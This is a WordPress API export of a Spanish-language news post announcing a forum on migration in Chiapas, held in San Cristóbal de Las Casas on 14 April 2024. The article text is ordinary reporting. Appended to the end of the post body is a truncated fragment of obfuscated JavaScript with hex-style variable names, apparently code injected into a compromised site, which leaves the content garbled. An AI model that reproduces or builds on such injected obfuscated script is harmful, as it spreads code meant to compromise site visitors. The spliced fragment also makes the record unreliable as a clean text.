{"id":15074,"date":"2024-04-13T02:13:22","date_gmt":"2024-04-13T02:13:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15074"},"modified":"2024-04-13T02:13:23","modified_gmt":"2024-04-13T02:13:23","slug":"anuncian-foro-en-sclc-sobre-tema-de-migracion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15074","title":{"rendered":"Anuncian Foro en SCLC sobre tema de migraci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"380\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240412-WA0006.jpg\" alt=\"\" class=\"wp-image-15075\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240412-WA0006.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240412-WA0006-300x158.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240412-WA0006-310x165.jpg 310w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>12 de abril del 2024. San Crist\u00f3bal de Las Casas.- El pr\u00f3ximo domingo 14 de abril, a las 16 horas, en el teatro Daniel Zebad\u00faa de esta ciudad se llevar\u00e1 a cabo un importante foro dedicado a los &#8220;Di\u00e1logos sobre la migraci\u00f3n en Chiapas&#8221;. Perspectiva, tendencias y soluciones&#8221;. Este evento, organizado por Ameht Rivera, Karla Mar\u00eda Guti\u00e9rrez y Javier L\u00f3pez S\u00e1nchez, promete ser un espacio de reflexi\u00f3n y acci\u00f3n en torno a uno de los temas m\u00e1s apremiantes de la actualidad.Entre los invitados especiales se encuentra el sacerdote Alejandro Solalinde, defensor de los derechos humanos, as\u00ed como Eduardo Ram\u00edrez Aguilar, candidato a gobernador de Chiapas.Los organizadores han destacado la urgencia de abordar la situaci\u00f3n migratoria en la regi\u00f3n, donde miles de personas, incluyendo hombres, mujeres y ni\u00f1os, buscan desesperadamente una visa humanitaria para transitar por M\u00e9xico en su camino hacia Estados Unidos. Sin embargo, lamentan que muchos de estos migrantes enfrentan hostigamiento, robos e incluso violencia mortal en su traves\u00eda.Adem\u00e1s, se\u00f1alan que no solo se trata de aquellos que llegan a Chiapas en busca de mejores oportunidades, sino tambi\u00e9n de los chiapanecos que, en busca de una vida mejor, emprenden el peligroso viaje hacia el norte. En este contexto, el foro buscar\u00e1 exponer las violaciones a los derechos humanos que sufren los migrantes centroamericanos en su paso por Chiapas, as\u00ed como las dificultades y riesgos que enfrentan los propios habitantes de la regi\u00f3n.Por ello, hacen un llamado a la ciudadan\u00eda a participar en esta importante iniciativa, donde se abordar\u00e1n temas cruciales y se buscar\u00e1n soluciones para una problem\u00e1tica que afecta a miles de personas en Chiapas y m\u00e1s all\u00e1.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 12 de abril del 2024. San Crist\u00f3bal de Las Casas.- El pr\u00f3ximo domingo 14 de abril, a las 16 horas, en el teatro Daniel Zebad\u00faa de esta ciudad se llevar\u00e1 a cabo un importante foro dedicado a los &#8220;Di\u00e1logos sobre la migraci\u00f3n en Chiapas&#8221;. Perspectiva, tendencias y soluciones&#8221;. Este evento, organizado por &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15075,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15074","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15074","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15074"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15074\/revisions"}],"predecessor-version":[{"id":15076,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15074\/revisions\/15076"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15075"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15074"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15074"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15074"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}